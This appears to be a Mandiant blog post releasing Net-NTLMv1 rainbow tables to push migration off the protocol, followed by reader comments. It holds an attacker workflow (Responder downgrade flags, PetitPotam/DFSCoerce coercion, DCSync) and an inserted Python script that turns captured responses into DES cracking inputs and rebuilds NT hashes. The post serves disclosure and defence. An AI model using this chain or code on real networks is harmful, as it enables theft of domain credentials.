
Mandiant is publicly releasing a comprehensive dataset of Net-NTLMv1 rainbow tables to underscore the urgency of migrating away from this outdated protocol. Despite Net-NTLMv1 being deprecated and known to be insecure for over two decades—with cryptanalysis dating back to 1999—Mandiant consultants continue to identify its use in active environments. This legacy protocol leaves organizations vulnerable to trivial credential theft, yet it remains prevalent due to inertia and a lack of demonstrated immediate risk.
By releasing these tables, Mandiant aims to lower the barrier for security professionals to demonstrate the insecurity of Net-NTLMv1. While tools to exploit this protocol have existed for years, they often required uploading sensitive data to third-party services or expensive hardware to brute-force keys. The release of this dataset allows defenders and researchers to recover keys in under 12 hours using consumer hardware costing less than $600 USD. This initiative highlights the amplified impact of combining Mandiant's frontline expertise with Google Cloud's resources to eliminate entire classes of attacks.
This post details the generation of the tables, provides access to the dataset for community use, and outlines critical remediation steps to disable Net-NTLMv1 and prevent authentication coercion attacks.
Net-NTLMv1 has been widely known to be insecure since at least 2012, following presentations at DEFCON 20, with cryptanalysis of the underlying protocol dating back to at least 1999. On Aug. 30, 2016, Hashcat added support for cracking Data Encryption Standard (DES) keys using known plaintext, further democratizing attacks on this protocol. Rainbow tables are nearly as old: Philippe Oechslin published the initial paper in 2003, building on the time-memory trade-off Martin Hellman described in 1980.
Essentially, if an attacker can obtain a Net-NTLMv1 response without Extended Session Security (ESS) for the known plaintext 1122334455667788, a known plaintext attack (KPA) applies: each 8-byte block of the response is a single-DES encryption of that fixed challenge under a key taken directly from the NT hash, so the key is guaranteed to be recoverable, whether by exhaustive search or by table lookup. Since that key material is the password hash of the authenticating Active Directory (AD) object, user or computer, the result can be used immediately to compromise the object, often leading to privilege escalation.
A common chain is authentication coercion from a highly privileged object, such as a domain controller (DC). Recovering the password hash of the DC machine account, which holds directory replication rights, lets the attacker DCSync and compromise any other account in AD.
The unsorted dataset can be downloaded using gsutil -m cp -r gs://net-ntlmv1-tables/tables . or through the Google Cloud Research Dataset portal.
The SHA512 hashes of the tables can be verified by first downloading the checksum file with gsutil -m cp gs://net-ntlmv1-tables/tables.sha512 . and then running sha512sum -c tables.sha512. The password cracking community has already created derivative work and is also hosting ready-to-use tables.
Once a Net-NTLMv1 hash has been obtained, the tables can be used with historical or modern reinventions of rainbow table searching software such as rainbowcrack (rcrack), or RainbowCrack-NG on central processing units (CPUs) or a fork of rainbowcrackalack on graphics processing units (GPUs). The Net-NTLMv1 hash needs to be preprocessed to the DES components using ntlmv1-multi as shown in the next section.
Most attackers run Responder with the --lm and --disable-ess flags and a static challenge of 1122334455667788, so that any client willing to fall back to Net-NTLMv1 produces a response against the known plaintext. Attackers can then wait for incoming connections or coerce authentication using a tool such as PetitPotam or DFSCoerce to generate incoming connections from DCs or lower privilege hosts that are useful for objective completion. Responses can be cracked to retrieve the password hashes of either users or computer machine accounts. A sample workflow for an attacker is shown below in Figure 1, Figure 2, and Figure 3.
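The preprocessing step the post refers to, as an added example (this is neither Mandiant's code nor ntlmv1-multi itself): a Responder-style capture is split into the three DES blocks of the NT response, captures that use ESS or a non-static challenge are rejected because the tables cannot help with them, the two full 56-bit keys are emitted in hashcat mode 14000 ciphertext:plaintext form, and recovered key material is reassembled into the NT hash. The capture format user::DOMAIN:LMresp:NTresp:challenge and the mode 14000 line format are assumptions about those tools, and the sample capture lines are constructed, not real responses.

```python
"""Split a captured Net-NTLMv1 response into its DES components.

Added example, not code from the original post. Net-NTLMv1 without ESS
computes the 24-byte NT response as DES(K1,C) || DES(K2,C) || DES(K3,C),
where C is the 8-byte server challenge and the 16-byte NT hash is split
into K1 = hash[0:7], K2 = hash[7:14], K3 = hash[14:16] + 5 zero bytes.
Assumed input format (Responder style): user::DOMAIN:LMresp:NTresp:challenge.
Assumed output format (hashcat -m 14000): ciphertext:plaintext, both hex.
"""
from dataclasses import dataclass

# The fixed server challenge the tables were generated for (the known plaintext).
STATIC_CHALLENGE = bytes.fromhex("1122334455667788")


@dataclass
class DesComponents:
    user: str
    domain: str
    challenge: bytes
    blocks: list  # three 8-byte ciphertexts: DES(K1,C), DES(K2,C), DES(K3,C)


def parse_responder_line(line: str) -> DesComponents:
    """Parse one captured line and reject anything the tables cannot attack."""
    fields = line.strip().split(":")
    if len(fields) != 6:
        raise ValueError("expected user::DOMAIN:LMresp:NTresp:challenge")
    user, _, domain, lm_hex, nt_hex, chal_hex = fields
    lm, nt, chal = (bytes.fromhex(h) for h in (lm_hex, nt_hex, chal_hex))
    if len(lm) != 24 or len(nt) != 24 or len(chal) != 8:
        raise ValueError("malformed response lengths")
    # With ESS (NTLM2 session security) the LM field carries an 8-byte client
    # nonce followed by 16 zero bytes, and the DES input becomes
    # MD5(server_challenge || client_nonce)[:8]. The plaintext is then no
    # longer the static challenge, so precomputed tables do not apply.
    if lm[8:] == bytes(16):
        raise ValueError("ESS in use (client nonce present); tables do not apply")
    if chal != STATIC_CHALLENGE:
        raise ValueError(f"challenge {chal.hex()} is not the table plaintext")
    return DesComponents(user, domain, chal, [nt[0:8], nt[8:16], nt[16:24]])


def hashcat_14000_lines(c: DesComponents) -> list:
    """K1 and K2 are full 56-bit keys: these are the blocks worth a table
    lookup or a GPU search. Output is 'ciphertext:plaintext' in hex."""
    return [f"{b.hex()}:{c.challenge.hex()}" for b in c.blocks[:2]]


def k3_candidates() -> int:
    """K3 is only hash[14:16] plus 5 zero bytes, so blocks[2] falls to a
    brute force of at most 2**16 keys; no table is needed for it."""
    return 1 << 16


def expand_des_key(key7: bytes) -> bytes:
    """Expand 7 bytes (56 bits) into the 8-byte DES key form: each byte
    carries 7 key bits and an odd-parity bit in its low position."""
    if len(key7) != 7:
        raise ValueError("DES key material must be 7 bytes")
    bits = int.from_bytes(key7, "big")
    out = bytearray()
    for i in range(8):
        b = ((bits >> (49 - 7 * i)) & 0x7F) << 1
        if bin(b).count("1") % 2 == 0:  # make the byte odd parity
            b |= 1
        out.append(b)
    return bytes(out)


def third_key(k3_tail: bytes) -> bytes:
    """Build the 8-byte third DES key from the 2 recovered bytes hash[14:16]."""
    if len(k3_tail) != 2:
        raise ValueError("K3 contributes exactly 2 bytes of the NT hash")
    return expand_des_key(k3_tail + bytes(5))


def nt_hash_from_keys(k1: bytes, k2: bytes, k3_tail: bytes) -> bytes:
    """Recovered key material concatenates straight back into the NT hash,
    which is usable as-is (pass-the-hash, DCSync) without any password."""
    if len(k1) != 7 or len(k2) != 7 or len(k3_tail) != 2:
        raise ValueError("expected 7 + 7 + 2 bytes of key material")
    return k1 + k2 + k3_tail


# Constructed sample captures: synthetic bytes, not real responses.
NT_HEX = "0102030405060708" "1112131415161718" "2122232425262728"
PLAIN_CAPTURE = f"svc_backup::CORP:{NT_HEX}:{NT_HEX}:1122334455667788"
ESS_CAPTURE = f"jdoe::CORP:cafebabe13371337{'00' * 16}:{NT_HEX}:1122334455667788"


def demo() -> dict:
    """Run both samples: the plain one yields table inputs, the ESS one is refused."""
    c = parse_responder_line(PLAIN_CAPTURE)
    try:
        parse_responder_line(ESS_CAPTURE)
        ess_rejected = False
    except ValueError:
        ess_rejected = True
    return {"hashcat": hashcat_14000_lines(c),
            "k3_block": c.blocks[2].hex(),
            "ess_rejected": ess_rejected}


if __name__ == "__main__":
    for line in demo()["hashcat"]:
        print(line)
```

The ESS check is the one practitioners most often get wrong: a capture with 16 trailing zero bytes in the LM field looks like Net-NTLMv1 but its DES plaintext is derived from a client nonce, so neither these tables nor a static-challenge Responder setup will recover the key from it.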
I recall using ntlm rainbow tables to crack windows hashes in high school in like 2008?
Amazing that this is still around and causing someone enough of a headache to justify spending money on.
Also amazing what a teenager with lots of free time and a bootable Linux usb can get up to.
There used to be a joint online project to compute these tables in a SETI-like distributed system. Everyone who contributed their CPU cycles could use the tables. And yeah, around 2005-2008.
LM, nthash aka NTLM, net-ntlmv1 aka ntlmv1, net-ntlmv2 aka NTLMv2. Challenge response stuff is different. Naming here is painful.
net-ntlmv1 rainbow tables have been around forever too though, the same attack documented in this blog post has been hosted as a web service at https://crack.sh/netntlm/ for 10+ years
Yeah, but now it's Google! Google!
Ah Microsoft and naming things... Name a better combo
But fair enough, I don't recall which exact version I was mucking with that long ago.
A few years ago I was doing some VM things in Azure. Hadn't touched Azure before, and spent 10+ minutes of frustration trying to figure out how to get amd64/x86_64 things started, as the only thing I could find was "Azure ARM", and on googling, "arm" here means Azure Resource Manager... ARGH, why does Microsoft insist on using existing names and acronyms!?!?
I was part of a user study on Azure back when it first rolled out-- they were looking for seniors with an AWS background to participate in UX research, and I remember walking out of that study with imposter syndrome for the very first time. Spent 60 minutes totally unable to do the thing I wanted to do when I was introduced to Azure for the first time, and I remember thinking... am I a fraud?
No! Not this time, at least. In hindsight everything was named and organized terribly and it hasn't improved much since.
Because in their eyes if something was not invented here, it may as well not exist :-) they haven’t managed to cure this sickness in decades.
Love this. Classic microsoft.
Yep, that and also could use Cain and Abel even back then... hardest part was putting whatever network card in promiscuous mode.
Yes!! That was the software, thanks for the memory trigger
To be vulnerable to this, what sort of dumb things are end users doing?
I couldn't immediately figure out here whether we're talking
0. Microsoft's supported products default enable this worthless "authentication" feature
1. Microsoft's supported products provide such a feature behind a UI that's not clearly marked "Danger: Do not stare into laser with remaining eye"
2: Microsoft does still support this, behind some Registry nonsense most users do not understand and once enabled it doesn't turn on the "I am a toxic waste dump, leave by nearest exit" warning signs on affected machines
3: Microsoft doesn't support this at all but some 3rd party commercial stuff does and customers really do love their crusty archaic 3rd party garbage
4: But this long abandoned SCO machine we've kept on life support for twenty years!
5: What does "supported" mean? Windows NT is scary, we're still on Windows 98 here.
You have to actively go out of your way to have this enabled. But large or older companies always have some old machine (can be as dumb as an old but very expensive printer) that isn't updated.
Even today the only reason to use samba 2 in 90% of companies where it's enabled are old appliances.
At some point device X isn't working, employees complain, IT say they need to buy a new very expensive replacement and after much argumentation they come to the agreement to enable that legacy horror support until the purchase can be made. Which is then never made.
This is mostly an issue in active directory networks. Usually the reason people give as to why they still have this enabled is due to some legacy system that can't authenticate via Kerberos or at least NetNTLMv2. Worst case is if they then enable NetNTLMv1 on the domain controllers, even if the DC acts as a client. Using authentication coercion, this is a pretty quick win for an adversary.
Ok, so it's a 2 on my list.
Microsoft needs to make this forcibly change the UI so that users can see "Oh! I'm using crap low security Windows". That lights a fire under people to actually get it fixed.
Using any variant of NTLM is insecure, which is why Microsoft is phasing it out in Windows 11/Server 2025. Which means we should be free of it some time around 2060.
For those interested: The SHA512 file lists 4096 files. Each file is 2 GiB. That means 8 TiB (or about 8.6 TB) of storage required.
Rule of thumb: Saturating 100Mbps moves roughly 1TB/day.